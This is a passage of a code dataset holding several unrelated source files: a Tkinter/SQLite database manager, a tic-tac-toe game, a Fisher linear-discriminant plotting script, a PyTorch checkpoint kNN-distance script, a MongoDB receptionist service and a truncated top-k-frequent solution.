
os.listdir(\"./\"):\r\n\t\t\tif filename.endswith(\".db\"):\r\n\t\t\t\tname_files.append(filename)\r\n\t\treturn name_files\r\n\r\n\tdef set_listbox(ListBox,NameFiles):\r\n\t\tfor filename in name_files:\r\n\t\t\tListBox.insert(\"end\",filename)\r\n\r\n\tdef define_current_database(Database):\r\n\t\tglobal current_database \r\n\t\tcurrent_database = Database\r\n\t\treturn current_database\r\n\r\n\tdef show_current_database(Database):\r\n\t\tmainlabel[\"text\"] = f\"Current Database is {Database}\"\r\n\r\n\tselect_database_window = tk.Tk()\r\n\tselect_database_window.title(\"Select a Database\")\r\n\tselect_database_window.resizable(False,False)\r\n\t\r\n\tcanvas = tk.Canvas(select_database_window, height=300, width=300, bg=\"#367800\")\r\n\tcanvas.pack()\r\n\r\n\tselect_listbox = tk.Listbox(select_database_window,selectmode=\"single\")\r\n\tname_files = get_name_files()\r\n\tset_listbox(select_listbox,name_files)\r\n\tselect_listbox.place(relx=0.5,rely=0.1,anchor=\"n\")\r\n\r\n\tselect_button = tk.Button(select_database_window,text=\"Select\",font=\"Times\",command=lambda: [define_current_database(select_listbox.get(first=select_listbox.curselection(),last=None)),\r\n\tshow_current_database(current_database),select_database_window.destroy()])\r\n\tselect_button.place(relx=0.3,rely=0.7,anchor=\"n\",relheight=0.1,relwidth=0.4)\r\n\r\n\tback2_button = tk.Button(select_database_window,text=\"Back\",font=\"Times\",command=lambda: select_database_window.destroy())\r\n\tback2_button.place(relx=0.7,rely=0.7,anchor=\"n\",relheight=0.1,relwidth=0.4) \r\n\r\n\tselect_database_window.mainloop()\r\n\r\ndef search_database_window(currentDatabase):\r\n\t\r\n\tdef search_by_name(Name,currentDatabase):\r\n\t\tselection = []\r\n\t\tconn = sqlite3.connect(f\"{currentDatabase}\")\r\n\t\tc = conn.cursor()\r\n\t\twith conn:\r\n\t\t\tc.execute(\"SELECT * FROM users WHERE first=?\",(Name,))\r\n\t\tselection = c.fetchall()\r\n\t\tuserlist = []\r\n\t\tfor user in selection:\r\n\t\t\tuserlist.append(list(user))\r\n\t\t\r\n\t\tsearch_result = tk.Tk()\r\n\t\tsearch_result.resizable(False,False)\r\n\r\n\t\tsearch_result_canvas = tk.Canvas(search_result,height=300,width=200)\r\n\t\tsearch_result_canvas.pack()\r\n\t\tsearch_listbox = tk.Listbox(search_result,selectmode=\"single\")\r\n\t\tfor user in userlist:\r\n\t\t\tsearch_listbox.insert(\"end\",user)\r\n\t\tsearch_listbox.place(relx=0.5,rely=0.1,anchor=\"n\")\r\n\r\n\t\tback4_button = tk.Button(search_result_canvas,text=\"Back\",font=\"Times\",command=lambda: search_result.destroy())\r\n\t\tback4_button.place(relx=0.5,rely=0.875,anchor=\"n\",relheight=0.1,relwidth=0.4)\r\n\r\n\t\tsearch_result.mainloop()\r\n\r\n\tdef search_by_last(Last,currentDatabase):\r\n\t\tselection = []\r\n\t\tconn = sqlite3.connect(f\"{currentDatabase}\")\r\n\t\tc = conn.cursor()\r\n\t\twith conn:\r\n\t\t\tc.execute(\"SELECT * FROM users WHERE last=?\",(Last,))\r\n\t\tselection = c.fetchall()\r\n\t\tuserlist = []\r\n\t\tfor user in selection:\r\n\t\t\tuserlist.append(list(user))\r\n\t\t\r\n\t\tsearch_result = tk.Tk()\r\n\t\tsearch_result.resizable(False,False)\r\n\r\n\t\tsearch_result_canvas = tk.Canvas(search_result,height=300,width=200)\r\n\t\tsearch_result_canvas.pack()\r\n\t\tsearch_listbox = tk.Listbox(search_result,selectmode=\"single\")\r\n\t\tfor user in userlist:\r\n\t\t\tsearch_listbox.insert(\"end\",user)\r\n\t\tsearch_listbox.place(relx=0.5,rely=0.1,anchor=\"n\")\r\n\r\n\t\tback5_button = tk.Button(search_result_canvas,text=\"Back\",font=\"Times\",command=lambda: 
search_result.destroy())\r\n\t\tback5_button.place(relx=0.5,rely=0.875,anchor=\"n\",relheight=0.1,relwidth=0.4)\r\n\r\n\t\tsearch_result.mainloop()\r\n\r\n\tdef search_by_email(EMail,currentDatabase):\r\n\t\tselection = []\r\n\t\tconn = sqlite3.connect(f\"{currentDatabase}\")\r\n\t\tc = conn.cursor()\r\n\t\twith conn:\r\n\t\t\tc.execute(\"SELECT * FROM users WHERE email=?\",(EMail,))\r\n\t\tselection = c.fetchall()\r\n\t\tuserlist = []\r\n\t\tfor user in selection:\r\n\t\t\tuserlist.append(list(user))\r\n\t\t\r\n\t\tsearch_result = tk.Tk()\r\n\t\tsearch_result.resizable(False,False)\r\n\r\n\t\tsearch_result_canvas = tk.Canvas(search_result,height=300,width=200)\r\n\t\tsearch_result_canvas.pack()\r\n\t\tsearch_listbox = tk.Listbox(search_result,selectmode=\"single\")\r\n\t\tfor user in userlist:\r\n\t\t\tsearch_listbox.insert(\"end\",user)\r\n\t\tsearch_listbox.place(relx=0.5,rely=0.1,anchor=\"n\")\r\n\r\n\t\tback6_button = tk.Button(search_result_canvas,text=\"Back\",font=\"Times\",command=lambda: search_result.destroy())\r\n\t\tback6_button.place(relx=0.5,rely=0.875,anchor=\"n\",relheight=0.1,relwidth=0.4)\r\n\r\n\t\tsearch_result.mainloop()\r\n\r\n\r\n\tif currentDatabase == \"\":\r\n\t\tmainlabel[\"text\"] = \"No Database is selected\"\r\n\r\n\telse:\r\n\t\tsearch_database_window = tk.Tk()\r\n\t\tsearch_database_window.title(\"Search Data\")\r\n\t\tsearch_database_window.resizable(False,False)\r\n\r\n\t\tsearch_database_canvas = tk.Canvas(search_database_window, height=300, width=300, bg=\"#367800\")\r\n\t\tsearch_database_canvas.pack()\r\n\r\n\t\tcurrent_database_label = tk.Label(search_database_window,text=f\"Current Database is {currentDatabase}\",font=\"Times\")\r\n\t\tcurrent_database_label.place(relx=0.5,rely=0.1,anchor=\"n\",relheight=0.1,relwidth=0.8)\r\n\r\n\t\tsearch_by_name_entry = tk.Entry(search_database_window, font=\"Times\")\r\n\t\tsearch_by_name_entry.place(relx=0.325,rely=0.3,anchor=\"n\",relheight=0.1,relwidth=0.6)\r\n\r\n\t\tsearch_by_name_button = tk.Button(search_database_window, font=[\"Times\",10], text=\"By Name\",command=lambda: search_by_name(search_by_name_entry.get(),current_database))\r\n\t\tsearch_by_name_button.place(relx=0.8,rely=0.3,anchor=\"n\",relheight=0.1,relwidth=0.3)\r\n\r\n\t\tsearch_by_last_entry = tk.Entry(search_database_window, font=\"Times\")\r\n\t\tsearch_by_last_entry.place(relx=0.325,rely=0.5,anchor=\"n\",relheight=0.1,relwidth=0.6)\r\n\r\n\t\tsearch_by_last_button = tk.Button(search_database_window, font=[\"Times\",10],text=\"By Last Name\",command=lambda: search_by_last(search_by_last_entry.get(),current_database))\r\n\t\tsearch_by_last_button.place(relx=0.8,rely=0.5,anchor=\"n\",relheight=0.1,relwidth=0.3)\r\n\r\n\t\tsearch_by_email_entry = tk.Entry(search_database_window, font=\"Times\")\r\n\t\tsearch_by_email_entry.place(relx=0.325,rely=0.7,anchor=\"n\",relheight=0.1,relwidth=0.6)\r\n\r\n\t\tsearch_by_email_button = tk.Button(search_database_window, font=[\"Times\",10],text=\"By Email\",command=lambda: search_by_email(search_by_email_entry.get(),current_database))\r\n\t\tsearch_by_email_button.place(relx=0.8,rely=0.7,anchor=\"n\",relheight=0.1,relwidth=0.3)\r\n\r\n\t\tback3_button = tk.Button(search_database_window,text=\"Back\",font=\"Times\",command=lambda: [search_database_window.destroy(),searchdatabutton.config(state=\"normal\")])\r\n\t\tback3_button.place(relx=0.5,rely=0.875,anchor=\"n\",relheight=0.1,relwidth=0.4)\r\n\r\n\t\tsearch_database_window.mainloop()\r\n\r\ndef delete_data_window(currentDatabase):\r\n\t\r\n\tdef 
delete_data(option):\r\n\t\tconn = sqlite3.connect(f\"{currentDatabase}\")\r\n\t\tc = conn.cursor()\r\n\t\twith conn:\r\n\t\t\tc.execute(\"DELETE FROM users WHERE email=?\",(option[2],))\r\n\r\n\tdef accept_data_deleted():\r\n\t\taccept = tk.Tk()\r\n\t\taccept.title(\"Delete Data\")\r\n\t\taccept.resizable(False,False)\r\n\t\taccept_canvas = tk.Canvas(accept,height=100,width=200)\r\n\t\taccept_canvas.pack()\r\n\t\taccept_frame = tk.Frame(accept)\r\n\t\taccept_frame.place(relheight=1,relwidth=1)\r\n\t\taccept_label = tk.Label(accept_frame,text=\"Data has been Deleted\")\r\n\t\taccept_label.place(relx=0.5,rely=0.3,relheight=0.2,relwidth=1,anchor=\"n\")\r\n\t\taccept_button = tk.Button(accept_frame,text=\"OK\",command=lambda: exit(accept))\r\n\t\taccept_button.place(relx=0.5,rely=0.7,relheight=0.2,relwidth=0.3,anchor=\"n\")\r\n\t\taccept.mainloop()\r\n\t\t\r\n\r\n\r\n\tif currentDatabase == \"\":\r\n\t\tmainlabel[\"text\"] = \"No Database is Selected\"\r\n\r\n\telse:\r\n\t\tdelete_data_window = tk.Tk()\r\n\t\tdelete_data_window.title(\"Delete Data\")\r\n\t\tdelete_data_window.resizable(False,False)\r\n\r\n\t\tdelete_data_canvas = tk.Canvas(delete_data_window,height=300,width=400)\r\n\t\tdelete_data_canvas.pack()\r\n\r\n\t\tselection = []\r\n\t\tconn = sqlite3.connect(f\"{currentDatabase}\")\r\n\t\tc = conn.cursor()\r\n\t\twith conn:\r\n\t\t\tc.execute(\"SELECT * FROM users\")\r\n\t\tselection = c.fetchall()\r\n\t\tuserlist = []\r\n\t\tfor user in selection:\r\n\t\t\tuserlist.append(list(user))\r\n\r\n\t\tdelete_listbox = tk.Listbox(delete_data_canvas,selectmode=\"single\")\r\n\t\tfor user in userlist:\r\n\t\t\tdelete_listbox.insert(\"end\",user)\r\n\t\tdelete_listbox.place(relx=0.5,rely=0.1,anchor=\"n\",relwidth=0.8)\r\n\r\n\t\tback7_button = tk.Button(delete_data_canvas,text=\"Back\",font=\"Times\",command=lambda: delete_data_window.destroy())\r\n\t\tback7_button.place(relx=0.7,rely=0.875,anchor=\"n\",relheight=0.1,relwidth=0.4)\r\n\r\n\t\tdelete_button = tk.Button(delete_data_canvas,text=\"Delete\",font=\"Times\",command=lambda: [delete_data(delete_listbox.get(delete_listbox.curselection())),accept_data_deleted()])\r\n\t\tdelete_button.place(relx=0.3,rely=0.875,anchor=\"n\",relheight=0.1,relwidth=0.4)\r\n\r\n\t\tdelete_data_window.mainloop()\r\n\r\n\r\n\r\nHEIGHT = 600\r\nWIDTH = 600\r\n\r\nroot = tk.Tk()\r\nroot.title(\"Database Manager\")\r\nroot.resizable(False,False)\r\n\r\ncanvas = tk.Canvas(root,height=HEIGHT,width=WIDTH,bg=\"black\")\r\ncanvas.pack()\r\n\r\nframe = tk.Frame(root,bg=\"#367800\",bd=3)\r\nframe.place(relx=0.5,rely=0.1,relheight=0.175,relwidth=0.9,anchor=\"n\")\r\n\r\nframe_bottom = tk.Frame(root,bg=\"#367800\",bd=6)\r\nframe_bottom.place(relx=0.5,rely=0.3,relheight=0.6,relwidth=0.9,anchor=\"n\")\r\n\r\nframe_exit = tk.Frame(root,bg=\"#367800\")\r\nframe_exit.place(relx=0.5,rely=0.93,relheight=0.05,relwidth=0.2,anchor=\"n\")\r\n\r\nfirstentry = tk.Entry(frame,font=\"Times\")\r\nfirstentry.place(relx=0.2,rely=0.1,relheight=0.2,relwidth=0.2)\r\n\r\nfirstlabel = tk.Label(frame,text=\"Name\",font=\"Times\",bg=\"#367800\",fg=\"white\")\r\nfirstlabel.place(relx=0.01,rely=0.1,relheight=0.2,relwidth=0.175)\r\n\r\nlastentry = tk.Entry(frame,font=\"Times\")\r\nlastentry.place(relx=0.2,rely=0.4,relheight=0.2,relwidth=0.2)\r\n\r\nlastlabel = tk.Label(frame,text=\"Last Name\",font=\"Times\",bg=\"#367800\",fg=\"white\")\r\nlastlabel.place(relx=0.01,rely=0.4,relheight=0.2,relwidth=0.175)\r\n\r\nemailentry = 
tk.Entry(frame,font=\"Times\")\r\nemailentry.place(relx=0.2,rely=0.7,relheight=0.2,relwidth=0.3)\r\n\r\nemaillabel = tk.Label(frame,text=\"Email\",font=\"Times\",bg=\"#367800\",fg=\"white\")\r\nemaillabel.place(relx=0.01,rely=0.7,relheight=0.2,relwidth=0.175)\r\n\r\nincludebutton = tk.Button(frame, text=\"Include Data\", font=[\"Times\",10], command=lambda: include_database(firstentry.get(),\r\nlastentry.get(),emailentry.get(),current_database))\r\nincludebutton.place(relx=0.9,rely=0.2,relheight=0.2,relwidth=0.3,anchor=\"e\")\r\n\r\nsearchdatabutton = tk.Button(frame, text=\"Search Data\", font=[\"Times\",10], command= lambda: search_database_window(current_database))\r\nsearchdatabutton.place(relx=0.9,rely=0.4,relheight=0.2,relwidth=0.3,anchor=\"e\")\r\n\r\nerasedatabutton = tk.Button(frame, text=\"Delete Data\", font=[\"Times\",10], command= lambda: delete_data_window(current_database))\r\nerasedatabutton.place(relx=0.9,rely=0.6,relheight=0.2,relwidth=0.3,anchor=\"e\")\r\n\r\ncreatedatabutton = tk.Button(frame, text=\"Create Database\", font=[\"Times\",10], command= lambda: add_database_window())\r\ncreatedatabutton.place(relx=0.75,rely=0.9,relheight=0.2,relwidth=0.2,anchor=\"e\")\r\n\r\nselectdatabutton = tk.Button(frame, text=\"Select Database\", font=[\"Times\",10], command= lambda: select_database_window())\r\nselectdatabutton.place(relx=0.975,rely=0.9,relheight=0.2,relwidth=0.2,anchor=\"e\")\r\n\r\nmainlabel = tk.Label(frame_bottom,text=\"\",font=[\"Times\",15])\r\nmainlabel.place(relwidth=1,relheight=1)\r\n\r\nexitbutton = tk.Button(frame_exit,text=\"Exit\",font=[\"Times\",10],command=lambda: exit(root))\r\nexitbutton.place(relheight=1,relwidth=1)\r\n\r\nroot.mainloop()","repo_name":"MolinaEsteban96/DatabaseManager","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21232472556","text":"from random import *\r\n\r\n\r\n# Type Error Handling and Board Checking remaining\r\ndef show_board(gboard):\r\n print(f' {gboard[0]} | {gboard[1]} | {gboard[2]}')\r\n print(r'-----------')\r\n print(f' {gboard[3]} | {gboard[4]} | {gboard[5]}')\r\n print(r'-----------')\r\n print(f' {gboard[6]} | {gboard[7]} | {gboard[8]}')\r\n\r\n\r\ndef isBoardFull():\r\n for i in board:\r\n if i == '_':\r\n return False\r\n return True\r\n\r\n\r\ndef isEmpty(pos):\r\n if board[pos] == '_':\r\n return True\r\n else:\r\n return False\r\n\r\n\r\ndef user_input():\r\n i = 0\r\n x = input(r\"Enter your position to mark 'X'\")\r\n if x == 'Q':\r\n print(\"Thank You for playing!\\nBye\")\r\n exit()\r\n else:\r\n x = int(x) - 1\r\n if isEmpty(x):\r\n if 0 <= x <= 8:\r\n print('you selected: ', x)\r\n return x\r\n else:\r\n print(\"Invalid position, Try again\")\r\n return user_input()\r\n else:\r\n if isBoardFull():\r\n print(\"It's a tie!\")\r\n exit()\r\n print(\"The position is occupied, Try again\")\r\n return user_input()\r\n\r\n\r\ndef cpu_input(gboard):\r\n if isBoardFull():\r\n print(\"It's a tie!\")\r\n exit()\r\n else:\r\n emptySpaces = []\r\n for x in range(len(gboard)):\r\n if gboard[x] == '_':\r\n emptySpaces.append(x)\r\n boardCopy = board.copy()\r\n #print(\"Empty Spaces: \", emptySpaces, \" Board Copy: \", boardCopy)\r\n\r\n # Winning Situation #\r\n for letter in ['O', 'X']:\r\n for pos in emptySpaces:\r\n #print(pos, \" \", end=\"\")\r\n boardCopy[pos] = letter\r\n if checkBoard(boardCopy, letter):\r\n #print('\\n')\r\n return pos\r\n else:\r\n boardCopy[pos] 
= '_'\r\n\r\n        # Center Filling\r\n        if gboard[4] == '_':\r\n            return 4\r\n\r\n        if gboard[4] == 'O':\r\n            # Edge Filling\r\n            for i in [1, 3, 5, 7]:\r\n                if gboard[i] == '_':\r\n                    return i\r\n            # Corner Filling\r\n            for i in [0, 2, 6, 8]:\r\n                if gboard[i] == '_':\r\n                    return i\r\n\r\n        elif gboard[4] == 'X':\r\n            # Corner Filling\r\n            for i in [0, 2, 6, 8]:\r\n                if gboard[i] == '_':\r\n                    return i\r\n            # Edge Filling\r\n            for i in [1, 3, 5, 7]:\r\n                if gboard[i] == '_':\r\n                    return i\r\n\r\n\r\ndef checkBoard(gboard, ch):\r\n    if (gboard[0] == ch and gboard[1] == ch and gboard[2] == ch) \\\r\n            or (gboard[3] == ch and gboard[4] == ch and gboard[5] == ch) \\\r\n            or (gboard[6] == ch and gboard[7] == ch and gboard[8] == ch) \\\r\n            or (gboard[0] == ch and gboard[3] == ch and gboard[6] == ch) \\\r\n            or (gboard[1] == ch and gboard[4] == ch and gboard[7] == ch) \\\r\n            or (gboard[2] == ch and gboard[5] == ch and gboard[8] == ch) \\\r\n            or (gboard[0] == ch and gboard[4] == ch and gboard[8] == ch) \\\r\n            or (gboard[2] == ch and gboard[4] == ch and gboard[6] == ch):\r\n        return True\r\n    else:\r\n        return False\r\n\r\n\r\ndef main():\r\n    while True:\r\n        uval = user_input()\r\n        board[uval] = 'X'\r\n        show_board(board)\r\n        if checkBoard(board, 'X'):\r\n            print(\"You Won !!!\")\r\n            break\r\n        print(\"-/-\\-/-\\-/-\\- The CPU will play now -/-\\-/-\\-/-\\-\")\r\n        cval = cpu_input(board)\r\n        board[cval] = 'O'\r\n        show_board(board)\r\n        if checkBoard(board, 'O'):\r\n            print(\"You Lost!\")\r\n            break\r\n    return\r\n\r\n\r\nprint(\"Let's Play Tic Tac Toe!!!\")\r\nprint(r\"Press 'Q' to quit\")\r\nglobal tricks\r\ntricks = True\r\nboard = ['_', '_', '_', '_', '_', '_', '_', '_', '_']\r\nshow_board(board)\r\nmain()\r\n","repo_name":"Onkar7798/Undefeated-TicTacToe","sub_path":"UndefeatedTicTacToe.py","file_name":"UndefeatedTicTacToe.py","file_ext":"py","file_size_in_byte":3901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33863249201","text":"\nimport numpy\nfrom sklearn.preprocessing import PolynomialFeatures\nfrom matplotlib import pyplot\n\nfrom machine_learning import MyKernelClassifier\nfrom machine_learning import LinearDiscriminant\nfrom machine_learning import generate_datasets\n\n# --------------------------------------------------------------------\ndef compute_hyperplane( X, Y ):\n    m1 = numpy.mean( X[ Y==1 ], axis=0 )\n    m2 = numpy.mean( X[ Y==0 ], axis=0 )\n\n    # General equation\n    A = - ( m1[1] - m2[1] )\n    B = ( m1[0] - m2[0] )\n    C = - A * m1[0] - B * m1[1]\n\n    # Intermediate point\n    ip = (m1+m2)/2.0\n\n    return A, B, C, ip, m1, m2\n# --------------------------------------------------------------------\n\n# --------------------------------------------------------------------\ndef compute_hyperplane_fisher( X, Y ):\n    \n    # The mean vector of each class\n    m1 = numpy.mean( X[ Y==1 ], axis=0 )\n    m2 = numpy.mean( X[ Y==0 ], axis=0 )\n\n    # Sw stores the variance within classes, it is accumulated for all classes\n    Sw = numpy.zeros( X.shape[1] )\n    for n in range(len(X)):\n        if Y[n] == 1 :\n            Sw = Sw + numpy.outer( (X[n] - m1 ), (X[n] - m1 ) )\n        else: \n            Sw = Sw + numpy.outer( (X[n] - m2 ), (X[n] - m2 ) )\n\n    invSw = numpy.linalg.inv(Sw)\n    w = numpy.dot( invSw, (m2-m1) )\n    w = w / numpy.sqrt(numpy.dot(w,w))\n\n    # General equation for 'w' as orthogonal to the hyperplane\n    A = -w[1]\n    B = w[0]\n    C = - A * m1[0] - B * m1[1]\n\n    # Intermediate point\n    ip = (m1+m2)/2.0\n\n    return A, B, C, ip, m1, m2\n# --------------------------------------------------------------------\n\n\nif 
__name__ == \"__main__\" :\n\n    X_train,Y_train,X_test,Y_test = generate_datasets.generate_multivariate_normals( 2, 2, 150, 50, 5.0, 2.0 )\n\n    pyplot.scatter( X_train[Y_train==1,0], X_train[Y_train==1,1], c='orange', s=50, edgecolors='none' )\n    pyplot.scatter( X_train[Y_train==0,0], X_train[Y_train==0,1], c='cyan', s=50, edgecolors='none' )\n\n    # fix the limits in order to show the data in isotropic axes\n    xmin,xmax = pyplot.xlim()\n    ymin,ymax = pyplot.ylim()\n    xmin=ymin=min(xmin,ymin)\n    xmax=ymax=max(xmax,ymax)\n    pyplot.xlim( xmin, xmax )\n    pyplot.ylim( ymin, ymax )\n\n    colors=['red','green','blue','magenta','yellow']\n    zx = numpy.linspace(xmin,xmax,1000)\n\n    # SIMPLE HYPERPLANE\n    A,B,C,ip,m1,m2 = compute_hyperplane( X_train, Y_train )\n    # slope and intercept of the hyperplane that is orthogonal to 'w'\n    slope = B/A\n    intercept = ip[1] - slope*ip[0]\n    # draw the hyperplane\n    pyplot.plot( zx, slope*zx+intercept, color=colors[0], lw=3, ls='--' );\n\n    # FISHER'S HYPERPLANE\n    A,B,C,ip,m1,m2 = compute_hyperplane_fisher( X_train, Y_train )\n    # slope and intercept of the hyperplane that is orthogonal to 'w'\n    slope = B/A\n    intercept = ip[1] - slope*ip[0]\n    # draw the hyperplane\n    pyplot.plot( zx, slope*zx+intercept, color=colors[2], lw=3, ls='--' );\n\n    # draw the line from mean 1 to mean 2\n    x0 = m1[0] ; y0 = m1[1]\n    x1 = m2[0] ; y1 = m2[1]\n    pyplot.plot( [x0,x1], [y0,y1], color=colors[3], lw=2 );\n\n    # compute the unitary 'w' given the general equation of it as orthogonal to the hyperplane\n    w=numpy.zeros( 2 )\n    w[0] = -B\n    w[1] = A\n    w = w / numpy.sqrt(numpy.dot(w,w))\n    \n    # decides where to show 'w'\n    x0 = 0.75*(xmax+xmin) ; y0 = slope * x0 + intercept\n    if y0 > ymax or y0 < ymin :\n        y0 = 0.75*(xmax+xmin)\n        x0 = (y0 - intercept)/slope\n        w = 0.25*(ymax-ymin)*w\n    else:\n        w = 0.25*(xmax-xmin)*w\n\n    # draw the arrow for 'w'\n    pyplot.annotate( 'w', xy=(x0,y0), xycoords='data', xytext=(x0+w[0],y0+w[1]), textcoords='data', arrowprops=dict(arrowstyle='<-') )\n\n    pyplot.grid()\n    pyplot.show()\n","repo_name":"ravalan/AprendizajeAutomatico","sub_path":"practicas_7_8/practica07/show-linear-discriminant.py","file_name":"show-linear-discriminant.py","file_ext":"py","file_size_in_byte":3739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20603440376","text":"import os\nimport random\nimport time\nimport warnings\nimport torch\nimport torch.nn as nn\nimport torch.nn.parallel\nimport torch.backends.cudnn as cudnn\nimport torch.optim\nimport torch.utils.data\nfrom torch.utils.data import DataLoader\nimport torchvision.transforms as transforms\nimport torchvision.datasets as datasets\nimport torchvision.models as models\nimport torch.nn.functional as F\nfrom utils.util import *\nfrom matplotlib import pyplot as plt\nimport numpy as np\nfrom sklearn.manifold import TSNE\n\ndef get_feats(loader, model):\n    batch_time = AverageMeter('Time', ':6.3f')\n    progress = ProgressMeter(\n        len(loader),\n        [batch_time],\n        prefix='Test: ')\n\n    # switch to evaluate mode\n    model.eval()\n    feats, labels, ptr = None, None, 0\n\n    with torch.no_grad():\n        end = time.time()\n        for i, (images, target) in enumerate(loader):\n            if i == 1000:\n                break\n            images = images.cuda(non_blocking=True)\n            cur_targets = target.cpu()\n            cur_feats = normalize(model(images)).cpu()\n            B, D = cur_feats.shape\n            inds = torch.arange(B) + ptr\n\n            if not ptr:\n                feats = torch.zeros((len(loader.dataset), D)).float()\n                labels = torch.zeros(len(loader.dataset)).long()\n\n            feats.index_copy_(0, inds, cur_feats)\n            
labels.index_copy_(0, inds, cur_targets)\n ptr += B\n\n # measure elapsed time\n batch_time.update(time.time() - end)\n end = time.time()\n\n if i % 100 == 0:\n print(progress.display(i))\n\n return feats, labels\n\ndef normalize(x):\n return x / x.norm(2, dim=1, keepdim=True)\n\ndef get_knn_dist(feats, batch_size, k):\n average = 0\n dist = torch.cdist(feats, feats, p=2)\n dist, nn_index = torch.topk(dist, k, dim=1, largest=False)\n mean_dist = torch.mean(dist, dim=1)\n average += torch.sum(mean_dist)\n return average / len(feats)\n # for i in range (0, len(feats), batch_size):\n # dist = torch.cdist(feats[i: i+batch_size], feats[i : i+batch_size], p=2)\n # dist, nn_index = torch.topk(dist, k, dim=1, largest=False)\n # mean_dist = torch.mean(dist, dim=1)\n # average += torch.sum(mean_dist) \n # return average / (len(feats) / batch_size)\n\ndef main():\n traindir = os.path.join('my_datasets/imagenet', 'train')\n valdir = os.path.join('my_datasets/imagenet', 'val')\n normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])\n\n train_transform = transforms.Compose([\n transforms.RandomResizedCrop(224),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n normalize,\n ])\n\n val_transform = transforms.Compose([\n transforms.Resize(256),\n transforms.CenterCrop(224),\n transforms.ToTensor(),\n normalize,\n ])\n batch_size=100\n train_loader = torch.utils.data.DataLoader(\n datasets.ImageFolder(traindir, val_transform),\n batch_size=batch_size, shuffle=True,\n num_workers=16, pin_memory=True)\n\n model = models.__dict__['resnet50']()\n model.fc = nn.Sequential()\n\n wts_paths = ['output/checkpoints/cvil2/ckpt_epoch_10.pth', 'output/checkpoints/cvil2/ckpt_epoch_50.pth', \n 'output/checkpoints/cvil2/ckpt_epoch_100.pth', 'output/checkpoints/cvil2/ckpt_epoch_150.pth',\n 'output/checkpoints/cvil2/ckpt_epoch_200.pth'] \n # wts_path = 'output/checkpoints/cvil2/ckpt_epoch_200.pth'\n means = []\n for wts_path in wts_paths:\n wts = torch.load(wts_path)\n if 'state_dict' in wts:\n ckpt = wts['state_dict']\n elif 'model' in wts:\n ckpt = wts['model']\n else:\n ckpt = wts\n\n for p in model.parameters():\n p.requires_grad = False\n\n ckpt = {k.replace('module.', ''): v for k, v in ckpt.items()}\n ckpt = {k.replace('q_encoder.', ''): v for k, v in ckpt.items()}\n ckpt = {k.replace('t_encoder.', ''): v for k, v in ckpt.items()}\n state_dict = {}\n\n for m_key, m_val in model.state_dict().items():\n if m_key in ckpt:\n state_dict[m_key] = ckpt[m_key]\n else:\n state_dict[m_key] = m_val\n print('not copied => ' + m_key)\n\n model.load_state_dict(state_dict)\n # print(model)\n\n backbone = nn.DataParallel(model).cuda()\n backbone.eval()\n\n train_feats, _ = get_feats(train_loader, backbone)\n train_feats.to('cuda')\n average = get_knn_dist(train_feats, batch_size, k=10)\n means.append(average.item())\n print(average)\n plt.plot([10, 50, 100, 150, 200], means, label='mean', color='red', marker='o')\n plt.savefig(\"plot_checkpoint_.png\")\n\nif __name__ == '__main__':\n main()","repo_name":"fereshtehforghani/mean-shift-for-SSL","sub_path":"checkpoint_singleshot.py","file_name":"checkpoint_singleshot.py","file_ext":"py","file_size_in_byte":4885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"43241401683","text":"from typing import List\nfrom bson import ObjectId\nfrom api.schemas.receptionist import Receptionist\nfrom config.mongoCon import MongoCon\n\n\ndef get_all_receptionists(doctor_id: str = None, search: 
str = None) -> List[Receptionist]:\n    find_condition = {\"role\": \"receptionist\"}\n    if doctor_id:\n        find_condition.update({\"doctors\": {\"$ne\": ObjectId(doctor_id)}})\n    if search:\n        find_condition.update({\n            \"$or\": [\n                {\"name\": {\"$regex\": search, \"$options\": \"i\"}},\n                {\"lastname\": {\"$regex\": search, \"$options\": \"i\"}}\n            ]\n        })\n    with MongoCon() as cnx:\n        receptionists = list(cnx.users.find(find_condition, {\"password\": 0}))\n        return receptionists\n\n\ndef get_dr_receptionists(doctor_id: str, search: str = None) -> List[Receptionist]:\n    find_condition = {\"role\": \"receptionist\", \"doctors\": ObjectId(doctor_id)}\n    if search:\n        find_condition.update({\n            \"$or\": [\n                {\"name\": {\"$regex\": search, \"$options\": \"i\"}},\n                {\"lastname\": {\"$regex\": search, \"$options\": \"i\"}}\n            ]\n        })\n    with MongoCon() as cnx:\n        receptionists = list(cnx.users.find(find_condition, {\"password\": 0}))\n        return receptionists\n\n\ndef assign_doctor(receptionist_id: str, doctor_id: str) -> bool:\n    with MongoCon() as cnx:\n        result = cnx.users.update_one(\n            {\"_id\": ObjectId(receptionist_id)},\n            {\n                \"$push\": {\"doctors\": ObjectId(doctor_id)}\n            })\n        return result.matched_count > 0\n\n\ndef unassign_doctor(receptionist_id: str, doctor_id: str) -> bool:\n    with MongoCon() as cnx:\n        receptionist = cnx.users.find_one(\n            {\"_id\": ObjectId(receptionist_id)})\n        if not receptionist:\n            return False\n        if len(receptionist[\"doctors\"]) > 1:\n            result = cnx.users.update_one(\n                {\"_id\": ObjectId(receptionist_id)},\n                {\n                    \"$pull\": {\"doctors\": ObjectId(doctor_id)}\n                })\n            return result.modified_count > 0\n        result = cnx.users.delete_one({\"_id\": ObjectId(receptionist_id)})\n        return result.deleted_count > 0\n","repo_name":"leningael/medicapp-api","sub_path":"api/services/receptionist.py","file_name":"receptionist.py","file_ext":"py","file_size_in_byte":2179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3126504993","text":"# -*- coding: utf-8 -*-\n# @File  : top_k_frequent_elements.py\n# @Author: clelandgt@163.com\n# @Date  : 2020-06-27\n# @Desc  :\nfrom typing import List\n\n\nclass Solution1:\n    \"\"\"\n    Time complexity: O(n)\n    Space complexity: O(n)\n    \"\"\"\n    def topKFrequent(self, nums: List[int], k: int) -> List[int]:\n        result = {}\n\n        for num in nums:\n            if result.get(num):\n                result[num] += 1\n            else:\n                result[num] = 1\n\n        return [item[0] for item in sorted(result.items(), key=lambda item: item[1], reverse=True)][:k]\n\n\ndef main():\n    test_cases = [\n        {'nums': 